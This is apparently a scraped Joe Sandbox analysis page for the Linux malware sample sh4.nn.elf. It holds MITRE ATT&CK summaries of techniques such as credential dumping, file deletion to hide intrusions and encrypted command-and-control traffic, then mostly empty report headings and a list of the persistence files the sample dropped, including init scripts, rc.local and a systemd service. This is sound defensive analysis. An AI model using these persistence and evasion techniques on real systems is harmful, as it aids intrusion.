Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report sh4.nn.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/boot/bootcmd

/etc/init.d/sh4.nn.elf

/etc/init.d/system

/etc/inittab

/etc/motd

/etc/profile

/etc/rc.local

/etc/systemd/system/custom.service

/memfd:snapd-env-generator (deleted)

/tmp/qemu-open.X9LbXv (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

System Behavior

Analysis Process: sh4.nn.elf PID: 6233, Parent PID: 6159

General

Chronological Activities

Analysis Process: sh4.nn.elf PID: 6250, Parent PID: 6233

General

Chronological Activities

Analysis Process: sh PID: 6250, Parent PID: 6233

General

Chronological Activities

Analysis Process: sh PID: 6259, Parent PID: 6250

Linux Analysis Report
sh4.nn.elf